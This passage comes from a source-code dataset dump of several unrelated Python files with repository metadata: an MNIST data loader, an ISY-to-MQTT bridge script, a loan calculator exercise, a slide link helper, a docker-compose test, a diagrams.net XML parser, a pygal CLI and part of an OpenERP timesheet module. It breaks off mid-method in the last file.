"MIT"
] | null | null | null | import numpy as np
import mnist
from sklearn.model_selection import train_test_split
from RegLib.HelperFunctions import create_frankie_data, create_X, plot_values_with_info,plot_values_with_two_y_axis
from yacs.config import CfgNode as CN
class DataLoader():
"""
Contains X_train, X_test, y_train, y_test for the dataset given in the config.
Can also have X_val and y_val for other sets than franke, size depends on the the config
"""
def __init__(self, cfg: CN, perm_index = [-1], one_hot_encode = True):
self.data_name = cfg.DATA.NAME
if self.data_name == "franke":
self.load_franke_data(cfg, perm_index)
elif self.data_name == "mnist":
self.load_mnist_data(cfg, one_hot_encode)
else:
raise ValueError(self.data_name, " is not found in DataLoader init")
def load_franke_data(self, cfg: CN, perm_index):
x, y, z = create_frankie_data(cfg.SEED, cfg.DATA.FRANKIE.N, cfg.DATA.FRANKIE.NOISE)
X = create_X(x, y, cfg.DATA.FRANKIE.P)
self.split_and_scale_train_test(X, z, perm_index, test_size = cfg.TEST_SIZE)
return self
def load_mnist_data(self, cfg: CN, one_hot_encode = True):
val_percent = cfg.DATA.MNIST.VAL_PERCENT
binary_classes = cfg.DATA.MNIST.BINARY
num_of_classes = len(binary_classes)
if(num_of_classes != 0):
assert num_of_classes == 2, "Cannot have " + str(num_of_classes) + " classes"
X_train, self.y_train, X_val, self.y_val, X_test, self.y_test = load_binary_dataset(binary_classes[0], binary_classes[1], val_percent)
else:
X_train, self.y_train, X_val, self.y_val, X_test, self.y_test = load_full_mnist(val_percent)
# One hot encode the results
if one_hot_encode:
self.y_train = self.one_hot_encode(self.y_train, 10)
self.y_val = self.one_hot_encode(self.y_val, 10)
self.y_test = self.one_hot_encode(self.y_test, 10)
# Pre-process the batch
X_mean, X_std = (np.mean(X_train), np.std(X_train))
self.X_train = self.pre_process_images(X_train, X_mean, X_std)
self.X_val = self.pre_process_images(X_val, X_mean, X_std)
self.X_test = self.pre_process_images(X_test, X_mean, X_std)
def one_hot_encode(self, Y: np.ndarray, num_classes: int):
new_Y = np.zeros((Y.shape[0], num_classes))
for i in range(len(Y)):
new_Y[i][Y[i]] = 1
return new_Y
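    # Example of the loop above:
    #   one_hot_encode(np.array([[2], [0]]), num_classes=4) returns
    #   [[0., 0., 1., 0.],
    #    [1., 0., 0., 0.]]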
def pre_process_images(self, X: np.ndarray, X_mean: float, X_std: float):
assert X.shape[1] == 784,\
f"X.shape[1]: {X.shape[1]}, should be 784"
X = (X - X_mean) / X_std
X = np.c_[X, np.ones(X.shape[0])] # Apply bias trick
return X
def split_and_scale_train_test(self, X, y, perm_index = [-1], test_size = 0.2):
assert X.shape[0] == y.shape[0], ("X.shape[0] and y.shape[0] needs to be the same length, but: " + str(X.shape[0]) + " != " + str(y.shape[0]))
if(len(perm_index) > 1):
X = X[perm_index]
y = y[perm_index]
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(X, y, test_size=test_size, shuffle=False)
self.X_train, self.X_val, self.y_train, self.y_val = train_test_split(self.X_train, self.y_train, test_size=0.25, shuffle = False)
self.X_train, self.X_test, self.X_val = self.scale_standard(self.X_train, self.X_test, self.X_val)
# Force the correct shape:
self.y_test.shape = (self.y_test.shape[0], 1)
self.y_train.shape = (self.y_train.shape[0], 1)
self.y_val.shape = (self.y_val.shape[0], 1)
return self
def scale_standard(self, train_data, test_data, val_data):
data_mean = np.mean(train_data[:,1:], axis = 0)
data_std = np.std(train_data[:,1:], axis = 0)
train_data_scaled = train_data
test_data_scaled = test_data
val_data_scaled = val_data
train_data_scaled[:,1:] = np.divide((train_data[:,1:] - data_mean), data_std)
test_data_scaled[:,1:] = np.divide((test_data[:,1:] - data_mean), data_std)
val_data_scaled[:,1:] = np.divide((val_data[:,1:] - data_mean), data_std)
return train_data_scaled, test_data_scaled, val_data_scaled
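# Hedged usage sketch (not part of the original project): builds a minimal yacs
# config containing only the fields DataLoader reads for the Franke dataset; the
# project's real config files most likely define additional options.
def _example_franke_loader():
    cfg = CN()
    cfg.SEED = 42
    cfg.TEST_SIZE = 0.2
    cfg.DATA = CN()
    cfg.DATA.NAME = "franke"
    cfg.DATA.FRANKIE = CN()
    cfg.DATA.FRANKIE.N = 100      # number of sampled (x, y) points
    cfg.DATA.FRANKIE.NOISE = 0.1  # noise added to the Franke function
    cfg.DATA.FRANKIE.P = 5        # polynomial degree used by create_X
    loader = DataLoader(cfg)      # fills the X_train/X_val/X_test and y_* splits
    return loader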
# https://github.com/hukkelas/TDT4265-StarterCode/tree/master/assignment1
def binary_prune_dataset(class1: int, class2: int,
X: np.ndarray, Y: np.ndarray):
"""
    Splits the dataset into class1 and class2. All other classes are removed.
Args:
X: images of shape [batch size, 784] in the range (0, 255)
Y: labels of shape [batch size]
"""
mask1 = (Y == class1)
mask2 = (Y == class2)
mask_total = np.bitwise_or(mask1, mask2)
Y_binary = Y.copy()
Y_binary[mask1] = 1
Y_binary[mask2] = 0
return X[mask_total], Y_binary[mask_total]
def train_val_split(X: np.ndarray, Y: np.ndarray, val_percentage: float):
"""
Randomly splits the training dataset into a training and validation set.
"""
idx = np.arange(0, X.shape[0])
np.random.shuffle(idx)
train_size = int(X.shape[0] * (1 - val_percentage))
idx_train = idx[:train_size]
idx_val = idx[train_size:]
X_train, Y_train = X[idx_train], Y[idx_train]
X_val, Y_val = X[idx_val], Y[idx_val]
return X_train, Y_train, X_val, Y_val
def load_binary_dataset(class1: int, class2: int, val_percentage: float):
"""
Loads, prunes and splits the dataset into train, validation and test.
"""
train_size = 20000
test_size = 2000
X_train, Y_train, X_test, Y_test = mnist.load()
# First 20000 images from train set
X_train, Y_train = X_train[:train_size], Y_train[:train_size]
# Last 2000 images from test set
X_test, Y_test = X_test[-test_size:], Y_test[-test_size:]
X_train, Y_train = binary_prune_dataset(
class1, class2, X_train, Y_train
)
X_test, Y_test = binary_prune_dataset(
class1, class2, X_test, Y_test
)
# Reshape to (N, 1)
Y_train = Y_train.reshape(-1, 1)
Y_test = Y_test.reshape(-1, 1)
X_train, Y_train, X_val, Y_val = train_val_split(
X_train, Y_train, val_percentage
)
# print(f"Train shape: X: {X_train.shape}, Y: {Y_train.shape}")
# print(f"Validation shape: X: {X_val.shape}, Y: {Y_val.shape}")
# print(f"Test shape: X: {X_test.shape}, Y: {Y_test.shape}")
return X_train, Y_train, X_val, Y_val, X_test, Y_test
def load_full_mnist(val_percentage: float):
"""
Loads and splits the dataset into train, validation and test.
"""
train_size = 20000
test_size = 2000
X_train, Y_train, X_test, Y_test = mnist.load()
# First 20000 images from train set
X_train, Y_train = X_train[:train_size], Y_train[:train_size]
# Last 2000 images from test set
X_test, Y_test = X_test[-test_size:], Y_test[-test_size:]
# Reshape to (N, 1)
Y_train = Y_train.reshape(-1, 1)
Y_test = Y_test.reshape(-1, 1)
X_train, Y_train, X_val, Y_val = train_val_split(
X_train, Y_train, val_percentage
)
# print(f"Train shape: X: {X_train.shape}, Y: {Y_train.shape}")
# print(f"Validation shape: X: {X_val.shape}, Y: {Y_val.shape}")
# print(f"Test shape: X: {X_test.shape}, Y: {Y_test.shape}")
return X_train, Y_train, X_val, Y_val, X_test, Y_test | 40.912088 | 150 | 0.645044 |
6527548527556d6ab58f2e9bb1488746eda96e90 | 426 | py | Python | isy_homie_start.py | jspeckman/ISY-Homie-Bridge | 2bb952e5bfc07cb85e961654963c2f4e5e962aec | [
"MIT"
] | null | null | null | isy_homie_start.py | jspeckman/ISY-Homie-Bridge | 2bb952e5bfc07cb85e961654963c2f4e5e962aec | [
"MIT"
] | null | null | null | isy_homie_start.py | jspeckman/ISY-Homie-Bridge | 2bb952e5bfc07cb85e961654963c2f4e5e962aec | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import time
import yaml
from isy_homie.bridge import Bridge
with open("isy_homie.yml", 'r') as ymlfile:
cfg = yaml.full_load(ymlfile)
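# Hedged example of the expected isy_homie.yml layout, inferred only from the
# keys read below; the real mqtt section may hold different fields, depending on
# what Bridge's mqtt_settings expects:
#   isy:
#     url: https://192.168.1.10
#     username: admin
#     password: secret
#   mqtt:
#     host: localhost
#     port: 1883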
try:
bridge = Bridge (address=cfg['isy'] ['url'], username=cfg['isy'] ['username'],password=cfg['isy'] ['password'],mqtt_settings=cfg['mqtt'])
while True:
time.sleep(10)
except (KeyboardInterrupt, SystemExit):
print("Quitting.")
| 21.3 | 141 | 0.657277 |
c1bd69bd31fa9e5aadcd22b9bc5fe26e61350f4b | 547 | py | Python | Mundo 1/Ex36.py | legna7/Python | 52e0b642d1b7acc592ec82dd360c5697fb0765db | [
"MIT"
] | 2 | 2020-04-18T21:56:35.000Z | 2020-04-23T00:00:08.000Z | Mundo-2/desafio-036.py | LeonardoARGR/Desafios-Python-Curso-em-Video | 3fb1b0615fce88f968b5ba6e4bac43fcb0e72d98 | [
"MIT"
] | null | null | null | Mundo-2/desafio-036.py | LeonardoARGR/Desafios-Python-Curso-em-Video | 3fb1b0615fce88f968b5ba6e4bac43fcb0e72d98 | [
"MIT"
] | null | null | null | valordacasa = float(input('What is the value of the house?: R$'))
salário = float(input('What is your salary?: R$'))
anos = int(input('Over how many years will you pay for the house?: '))
print(f'To pay for a house worth R${valordacasa :.2f} over {anos} years, the monthly installment will be R${valordacasa / anos / 12 :.2f}')
if valordacasa / anos / 12 > salário * 30 / 100:
    print(f'Sorry, but you cannot finance this house, loan DENIED.')
elif valordacasa / anos / 12 <= salário * 30 / 100:
    print(f'You can finance the house, loan APPROVED.')
| 60.777778 | 129 | 0.687386 |
7b1f90135966bdbc366edeb69de7371f27fe38e9 | 1,232 | py | Python | Slides/Slide/Cell/Link.py | olesmith/SmtC | dfae5097f02192b60aae05b9d02404fcfe893be3 | [
"CC0-1.0"
] | null | null | null | Slides/Slide/Cell/Link.py | olesmith/SmtC | dfae5097f02192b60aae05b9d02404fcfe893be3 | [
"CC0-1.0"
] | null | null | null | Slides/Slide/Cell/Link.py | olesmith/SmtC | dfae5097f02192b60aae05b9d02404fcfe893be3 | [
"CC0-1.0"
] | null | null | null | import re,glob
class Slides_Slide_Cell_Link():
def Slide_Cell_Command_Detect_Args(self,command,content):
regexp='@'+command+'{'
args=[]
if ( re.search(regexp,content, re.IGNORECASE) ):
args=re.sub(regexp,"",content, flags=re.IGNORECASE)
args=re.sub('}\s*$',"",args)
args=re.compile("}{").split(args)
return args
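    # Worked example (assumed input format, matching the regex handling above):
    #   Slide_Cell_Command_Detect_Args("Link", "@Link{docs/notes.pdf}{Lecture notes}")
    #   returns ['docs/notes.pdf', 'Lecture notes']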
def Slide_Cell_Link_Insert(self,content,paths):
args=self.Slide_Cell_Command_Detect_Args("Link",content)
if ( len(args)>=1):
filename=args[0]
title=filename
if ( len(args)>1 ):
title=args[1]
paths=[filename]
if (not re.search('^http(s)?://',filename)):
paths=[
"/cgi-bin/Download?File=/Slides",
]+paths+[filename]
uri="/".join(paths)
content=[
self.XML_Tags(
"A",
title,
{
"HREF": uri,
"TARGET": "_",
}
)
]
return self.Center(content)
| 25.666667 | 64 | 0.428571 |
184aff4de4071ccc660cdc8749d701a4bfadfa4d | 649 | py | Python | tests/unit/cli/docker_client_test.py | paulczar/compose | 02f119e4b728169a7c5ca1e5ee34a3e4adf4ca61 | [
"Apache-2.0"
] | null | null | null | tests/unit/cli/docker_client_test.py | paulczar/compose | 02f119e4b728169a7c5ca1e5ee34a3e4adf4ca61 | [
"Apache-2.0"
] | 1 | 2021-03-26T00:41:22.000Z | 2021-03-26T00:41:22.000Z | tests/unit/cli/docker_client_test.py | paulczar/compose | 02f119e4b728169a7c5ca1e5ee34a3e4adf4ca61 | [
"Apache-2.0"
] | null | null | null | from __future__ import unicode_literals
from __future__ import absolute_import
import os
import mock
from tests import unittest
from compose.cli import docker_client
class DockerClientTestCase(unittest.TestCase):
def test_docker_client_no_home(self):
with mock.patch.dict(os.environ):
del os.environ['HOME']
docker_client.docker_client()
def test_docker_client_with_custom_timeout(self):
with mock.patch.dict(os.environ):
os.environ['DOCKER_CLIENT_TIMEOUT'] = timeout = "300"
client = docker_client.docker_client()
self.assertEqual(client.timeout, int(timeout))
| 28.217391 | 65 | 0.721109 |
56193647aa18ab4d433ae74c653e44d937a49017 | 12,203 | py | Python | cairis/mio/DiagramsNetContentHandler.py | anonymous-author21/cairis | feccb3ecc94ec864dbc87393e21de22bea704e19 | [
"Apache-2.0"
] | 62 | 2019-08-23T02:42:29.000Z | 2022-03-29T10:52:19.000Z | cairis/mio/DiagramsNetContentHandler.py | anonymous-author21/cairis | feccb3ecc94ec864dbc87393e21de22bea704e19 | [
"Apache-2.0"
] | 223 | 2019-07-29T09:49:54.000Z | 2022-03-29T09:48:21.000Z | cairis/mio/DiagramsNetContentHandler.py | anonymous-author21/cairis | feccb3ecc94ec864dbc87393e21de22bea704e19 | [
"Apache-2.0"
] | 32 | 2019-10-14T12:27:42.000Z | 2022-03-19T08:08:23.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from xml.sax.handler import ContentHandler,EntityResolver
from cairis.core.Borg import Borg
from xml.sax.saxutils import unescape
from cairis.core.ARM import ARMException
import re
__author__ = 'Shamal Faily'
def sanitise(str):
return re.sub(r'\<[^>]*\>','',str)
def attrsToDict(str):
g = {}
for val in list(map(lambda x: x.split('='),str.rstrip(';').split(';'))): g[val[0]] = val[1]
return g
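# Example (a diagrams.net mxCell style string of key=value pairs):
#   attrsToDict('startArrow=diamond;startFill=1;endArrow=block;')
#   returns {'startArrow': 'diamond', 'startFill': '1', 'endArrow': 'block'}
# Note that every value comes back as a string.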
class DiagramsNetContentHandler(ContentHandler,EntityResolver):
def __init__(self,modelType):
self.theModelType = modelType
self.theObjects = {}
self.theAssociations = []
self.theUpdatedAssociations = []
self.theTrustBoundaries = {}
self.theUpdatedTrustBoundaries = {}
self.theFlows = {}
self.theUpdatedFlows = []
self.resetObjectAttributes()
self.resetTrustBoundaryAttributes()
self.inFlow = 0
def resolveEntity(self,publicId,systemId):
return systemId
def resetObjectAttributes(self):
self.theObjectId = 0
self.inObject = 0
def resetTrustBoundaryAttributes(self):
self.theObjectId = 0
self.inTrustBoundary = 0
def objects(self): return list(self.theObjects.values())
def flows(self): return self.theUpdatedFlows
def trustBoundaries(self): return list(self.theUpdatedTrustBoundaries.values())
def associations(self): return self.theUpdatedAssociations
def startElement(self,name,attrs):
if (name == 'object'):
self.theObjectId = attrs['id']
if self.theModelType == 'dataflow':
if 'type' not in attrs:
if 'assets' not in attrs and self.theObjectId != '0':
self.theFlows[self.theObjectId] = {'assets' : ['Unknown information']}
elif 'assets' in attrs and self.theObjectId != '0':
self.theFlows[self.theObjectId] = {'name' : 'Undefined flow', 'assets' : list(map(lambda v: v.strip(), attrs['assets'].split(','))) }
self.inFlow = 1
else:
objtType = attrs['type'].lower().strip()
if objtType in ['trust_boundary','trust boundary','trustboundary']:
if 'name' not in attrs:
raise ARMException('Trust boundary defined without a name')
self.theTrustBoundaries[self.theObjectId] = {'name' : sanitise(attrs['name'])}
self.inTrustBoundary = 1
else:
if 'label' not in attrs:
raise ARMException('DFD object defined without a name')
objtName = sanitise(attrs['label'])
if objtType not in ['process','entity','datastore']:
raise ARMException(objtType + ' is not a valid type for DFD object ' + objtName)
self.theObjects[self.theObjectId] = {'name' : objtName, 'type' : objtType}
self.inObject = 1
elif self.theModelType == 'asset':
if 'label' not in attrs:
raise ARMException('Object ' + self.theObjectId + " has no label.")
assetName = attrs['label'].strip()
assetType = 'information'
if 'type' in attrs:
assetType = attrs['type'].lower().strip()
if (assetType not in ['hardware','information','people','software','systems']):
raise ARMException(attrs['type'] + " is an invalid type for asset " + assetName + ". Valid types are Hardware, Information, People, Software, and Systems.")
assetSC = 'TBD'
if 'short_code' in attrs:
assetSC = attrs['short_code']
assetDesc = 'To be defined'
if 'description' in attrs:
assetDesc = attrs['description']
assetSig = 'To be defined'
if 'significance' in attrs:
assetSig = attrs['significance']
secProperties = [0,0,0,0,0,0,0,0]
propRationale = ['None','None','None','None','None','None','None','None']
secAttrs = ['confidentiality','integrity','availability','accountability','anonymity','pseudonymity','unlinkability','unobservability']
valueLookup = {'none' : 0, 'low' : 1, 'medium' : 2, 'high' : 3}
for idx,secAttr in enumerate(secAttrs):
saKey = ''
if secAttr in attrs:
saKey = secAttr
elif secAttr not in attrs and secAttr.capitalize() in attrs:
saKey = secAttr.capitalize()
if saKey != '':
secProp = attrs[saKey].lower().strip()
if secProp not in valueLookup:
raise ARMException(secProp + ' is an invalid ' + secAttr + ' value for asset ' + assetName)
else:
propValue = valueLookup[secProp]
secProperties[idx] = propValue
prKey = secAttr + '_rationale'
if prKey in attrs:
propRationale[idx] = attrs[prKey]
else:
if propValue == 0:
propRationale[idx] = 'None'
else:
propRationale[idx] = 'To be defined'
else:
secProperties[idx] = 0
propRationale[idx] = 'None'
if (secProperties == [0,0,0,0,0,0,0,0]):
secAttrs = [0,0,1,0,0,0,0,0]
propRationale = []
for secProp in secProperties:
if (secProp == 0):
propRationale.append('None')
else:
propRationale.append('To be defined')
self.theObjects[self.theObjectId] = {'name' : assetName, 'short_code' : assetSC, 'type' : assetType.capitalize(), 'description' : assetDesc, 'significance' : assetSig, 'properties' : secProperties, 'rationale' : propRationale}
elif (name == 'mxCell' and self.theModelType == 'dataflow' and self.inFlow):
objectId = self.theObjectId
if('source' in attrs and 'target' in attrs and self.inFlow):
if objectId in self.theFlows:
self.theFlows[objectId]['from_name'] = attrs['source']
self.theFlows[objectId]['from_type'] = ''
self.theFlows[objectId]['to_name'] = attrs['target']
self.theFlows[objectId]['to_type'] = ''
elif('parent' in attrs and objectId in self.theFlows and attrs['parent'] != '0'):
self.theFlows[objectId]['name'] = attrs['value']
self.inFlow = 0
elif (name == 'mxCell' and self.theModelType == 'asset' and 'source' in attrs and 'target' in attrs):
if ('style' not in attrs):
raise ARMException('Missing style attribute in mxCell id ' + attrs['id'])
d = attrsToDict(attrs['style'])
headNav = 0
tailNav = 0
headType = 'Association'
tailType = 'Association'
if (('startArrow' not in d) and ('endArrow' not in d) and ('edgeStyle' in d) and (d['edgeStyle'] == 'orthogonalEdgeStyle')):
tailNav = 1
else:
if (('startArrow' not in d) or (d['startArrow'] == 'None')):
headType = 'Association'
elif d['startArrow'] in ['classic','open','openThin']:
headType = 'Association'
headNav = 1
elif d['startArrow'] in ['diamond','diamondThin']:
headType = 'Aggregation'
          if d['startFill'] == '1':
headType = 'Composition'
elif d['startArrow'] == 'block':
headType = 'Inheritance'
if (('endArrow' not in d) or (d['endArrow'] == 'None')):
tailType = 'Association'
elif d['endArrow'] in ['classic','open','openThin']:
tailType = 'Association'
tailNav = 1
elif d['endArrow'] in ['diamond','diamondThin']:
tailType = 'Aggregation'
          if d['endFill'] == '1':
tailType = 'Composition'
elif d['endArrow'] == 'block':
tailType = 'Inheritance'
self.theAssociations.append({'head' : attrs['source'], 'tail' : attrs['target'], 'headType' : headType, 'headNav' : headNav, 'tailType' : tailType, 'tailNav' : tailNav})
elif (name == 'mxGeometry' and self.theModelType == 'dataflow'):
if (self.inObject):
self.theObjects[self.theObjectId]['minX'] = float(attrs['x'])
self.theObjects[self.theObjectId]['maxX'] = float(attrs['x']) + float(attrs['width'])
self.theObjects[self.theObjectId]['minY'] = float(attrs['y'])
self.theObjects[self.theObjectId]['maxY'] = float(attrs['y']) + float(attrs['height'])
elif (self.inTrustBoundary):
self.theTrustBoundaries[self.theObjectId]['minX'] = float(attrs['x'])
self.theTrustBoundaries[self.theObjectId]['maxX'] = float(attrs['x']) + float(attrs['width'])
self.theTrustBoundaries[self.theObjectId]['minY'] = float(attrs['y'])
self.theTrustBoundaries[self.theObjectId]['maxY'] = float(attrs['y']) + float(attrs['height'])
def endElement(self,name):
if (name == 'object'):
if (self.inObject):
self.resetObjectAttributes()
elif (self.inTrustBoundary):
self.resetTrustBoundaryAttributes()
elif (name == 'diagram'):
if (self.theModelType == 'dataflow'):
self.updateFlows()
self.updateTrustBoundaries()
elif (self.theModelType == 'asset'):
self.updateAssociations()
def updateFlows(self):
validFlowTypes = set([('entity','process'),('process','entity'),('datastore','process'),('process','datastore'),('process','process')])
for objtKey in self.theFlows:
f = self.theFlows[objtKey]
dfName = f['name']
fromName = self.theObjects[f['from_name']]['name']
fromType = self.theObjects[f['from_name']]['type']
toName = self.theObjects[f['to_name']]['name']
toType = self.theObjects[f['to_name']]['type']
if ((fromType,toType) not in validFlowTypes):
raise ARMException('Data flow ' + dfName + ' is invalid because ' + fromType + ' to ' + toType + ' flows are not permissible.')
else:
self.theUpdatedFlows.append({'name' : dfName, 'from_name' : fromName, 'from_type' : fromType, 'to_name' : toName, 'to_type' : toType, 'assets' : f['assets']})
def updateTrustBoundaries(self):
for tbKey in self.theTrustBoundaries:
tbMinX = self.theTrustBoundaries[tbKey]['minX']
tbMaxX = self.theTrustBoundaries[tbKey]['maxX']
tbMinY = self.theTrustBoundaries[tbKey]['minY']
tbMaxY = self.theTrustBoundaries[tbKey]['maxY']
tbName = self.theTrustBoundaries[tbKey]['name']
for objtKey in self.theObjects:
objtName = self.theObjects[objtKey]['name']
minX = self.theObjects[objtKey]['minX']
maxX = self.theObjects[objtKey]['maxX']
minY = self.theObjects[objtKey]['minY']
maxY = self.theObjects[objtKey]['maxY']
if (tbMinX <= minX and tbMaxX >= maxX and tbMinY <= minY and tbMaxY >= maxY):
if (tbKey not in self.theUpdatedTrustBoundaries):
self.theUpdatedTrustBoundaries[tbKey] = {'name' : tbName, 'components' : []}
compType = self.theObjects[objtKey]['type']
if (compType == 'entity'):
raise ARMException("Cannot add entity " + objtName + " to trust boundary " + tbName + ". Entities are invalid trust boundary components.")
else:
self.theUpdatedTrustBoundaries[tbKey]['components'].append({'name' : objtName, 'type' : compType})
def updateAssociations(self):
for assoc in self.theAssociations:
self.theUpdatedAssociations.append({'head' : self.theObjects[assoc['head']]['name'], 'headType' : assoc['headType'], 'headNav' : assoc['headNav'], 'tail' : self.theObjects[assoc['tail']]['name'], 'tailType' : assoc['tailType'], 'tailNav' : assoc['tailNav']})
| 45.87594 | 264 | 0.616897 |
4289684cab73c355b80e91cd9e90905976279bc7 | 2,380 | py | Python | venv/Scripts/pygal_gen.py | xiaoshir/EnergyStorageTechnologies | 0298073d7bbd267919c6f08af4f24ca85168d629 | [
"BSD-3-Clause"
] | null | null | null | venv/Scripts/pygal_gen.py | xiaoshir/EnergyStorageTechnologies | 0298073d7bbd267919c6f08af4f24ca85168d629 | [
"BSD-3-Clause"
] | null | null | null | venv/Scripts/pygal_gen.py | xiaoshir/EnergyStorageTechnologies | 0298073d7bbd267919c6f08af4f24ca85168d629 | [
"BSD-3-Clause"
] | null | null | null | #!C:\Users\Adrian Grylka\PycharmProjects\untitled\venv\Scripts\python.exe
# -*- coding: utf-8 -*-
# This file is part of pygal
#
# A python svg graph plotting library
# Copyright © 2012-2016 Kozea
#
# This library is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with pygal. If not, see <http://www.gnu.org/licenses/>.
import argparse
import pygal
parser = argparse.ArgumentParser(
description='Generate pygal chart in command line',
prog='pygal_gen')
parser.add_argument('-t', '--type', dest='type', default='Line',
choices=map(lambda x: x.__name__, pygal.CHARTS),
help='Kind of chart to generate')
parser.add_argument('-o', '--output', dest='filename', default='pygal_out.svg',
help='Filename to write the svg to')
parser.add_argument('-s', '--serie', dest='series', nargs='+', action='append',
help='Add a serie in the form (title val1 val2...)')
parser.add_argument('--version', action='version',
version='pygal %s' % pygal.__version__)
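# Illustrative invocation (chart types are the class names in pygal.CHARTS, and
# each -s takes a title followed by numeric values):
#   pygal_gen.py -t Bar -o chart.svg -s "Serie A" 1 2 3 -s "Serie B" 4 5 6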
for key in pygal.config.CONFIG_ITEMS:
opt_name = key.name
val = key.value
opts = {}
if key.type == list:
opts['type'] = key.subtype
opts['nargs'] = '+'
else:
opts['type'] = key.type
if opts['type'] == bool:
del opts['type']
opts['action'] = 'store_true' if not val else 'store_false'
if val:
opt_name = 'no-' + opt_name
if key.name == 'interpolate':
opts['choices'] = list(pygal.interpolate.INTERPOLATIONS.keys())
parser.add_argument(
'--%s' % opt_name, dest=key.name, default=val, **opts)
config = parser.parse_args()
chart = getattr(pygal, config.type)(**vars(config))
for serie in config.series:
chart.add(serie[0], map(float, serie[1:]))
chart.render_to_file(config.filename)
| 34.492754 | 79 | 0.657143 |
1d7e701ed14ec50ad6315a2af496f591f0a1d096 | 31,815 | py | Python | openerp/addons/hr_timesheet_sheet/hr_timesheet_sheet.py | ntiufalara/openerp7 | 903800da0644ec0dd9c1dcd34205541f84d45fe4 | [
"MIT"
] | 3 | 2016-01-29T14:39:49.000Z | 2018-12-29T22:42:00.000Z | openerp/addons/hr_timesheet_sheet/hr_timesheet_sheet.py | ntiufalara/openerp7 | 903800da0644ec0dd9c1dcd34205541f84d45fe4 | [
"MIT"
] | 2 | 2016-03-23T14:29:41.000Z | 2017-02-20T17:11:30.000Z | openerp/addons/hr_timesheet_sheet/hr_timesheet_sheet.py | ntiufalara/openerp7 | 903800da0644ec0dd9c1dcd34205541f84d45fe4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from datetime import datetime
from dateutil.relativedelta import relativedelta
from pytz import timezone
import pytz
from openerp.osv import fields, osv
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT
from openerp.tools.translate import _
from openerp import netsvc
class hr_timesheet_sheet(osv.osv):
_name = "hr_timesheet_sheet.sheet"
_inherit = "mail.thread"
_table = 'hr_timesheet_sheet_sheet'
_order = "id desc"
_description="Timesheet"
def _total(self, cr, uid, ids, name, args, context=None):
""" Compute the attendances, analytic lines timesheets and differences between them
for all the days of a timesheet and the current day
"""
res = {}
for sheet in self.browse(cr, uid, ids, context=context or {}):
res.setdefault(sheet.id, {
'total_attendance': 0.0,
'total_timesheet': 0.0,
'total_difference': 0.0,
})
for period in sheet.period_ids:
res[sheet.id]['total_attendance'] += period.total_attendance
res[sheet.id]['total_timesheet'] += period.total_timesheet
res[sheet.id]['total_difference'] += period.total_attendance - period.total_timesheet
return res
def check_employee_attendance_state(self, cr, uid, sheet_id, context=None):
ids_signin = self.pool.get('hr.attendance').search(cr,uid,[('sheet_id', '=', sheet_id),('action','=','sign_in')])
ids_signout = self.pool.get('hr.attendance').search(cr,uid,[('sheet_id', '=', sheet_id),('action','=','sign_out')])
if len(ids_signin) != len(ids_signout):
            raise osv.except_osv(_('Warning!'),_('The timesheet cannot be validated as it does not contain an equal number of sign ins and sign outs.'))
return True
def copy(self, cr, uid, ids, *args, **argv):
raise osv.except_osv(_('Error!'), _('You cannot duplicate a timesheet.'))
def create(self, cr, uid, vals, context=None):
if 'employee_id' in vals:
if not self.pool.get('hr.employee').browse(cr, uid, vals['employee_id'], context=context).user_id:
raise osv.except_osv(_('Error!'), _('In order to create a timesheet for this employee, you must assign it to a user.'))
if not self.pool.get('hr.employee').browse(cr, uid, vals['employee_id'], context=context).product_id:
raise osv.except_osv(_('Error!'), _('In order to create a timesheet for this employee, you must link the employee to a product, like \'Consultant\'.'))
if not self.pool.get('hr.employee').browse(cr, uid, vals['employee_id'], context=context).journal_id:
raise osv.except_osv(_('Configuration Error!'), _('In order to create a timesheet for this employee, you must assign an analytic journal to the employee, like \'Timesheet Journal\'.'))
if vals.get('attendances_ids'):
# If attendances, we sort them by date asc before writing them, to satisfy the alternance constraint
vals['attendances_ids'] = self.sort_attendances(cr, uid, vals['attendances_ids'], context=context)
return super(hr_timesheet_sheet, self).create(cr, uid, vals, context=context)
def write(self, cr, uid, ids, vals, context=None):
if 'employee_id' in vals:
new_user_id = self.pool.get('hr.employee').browse(cr, uid, vals['employee_id'], context=context).user_id.id or False
if not new_user_id:
raise osv.except_osv(_('Error!'), _('In order to create a timesheet for this employee, you must assign it to a user.'))
if not self._sheet_date(cr, uid, ids, forced_user_id=new_user_id, context=context):
raise osv.except_osv(_('Error!'), _('You cannot have 2 timesheets that overlap!\nYou should use the menu \'My Timesheet\' to avoid this problem.'))
if not self.pool.get('hr.employee').browse(cr, uid, vals['employee_id'], context=context).product_id:
raise osv.except_osv(_('Error!'), _('In order to create a timesheet for this employee, you must link the employee to a product.'))
if not self.pool.get('hr.employee').browse(cr, uid, vals['employee_id'], context=context).journal_id:
raise osv.except_osv(_('Configuration Error!'), _('In order to create a timesheet for this employee, you must assign an analytic journal to the employee, like \'Timesheet Journal\'.'))
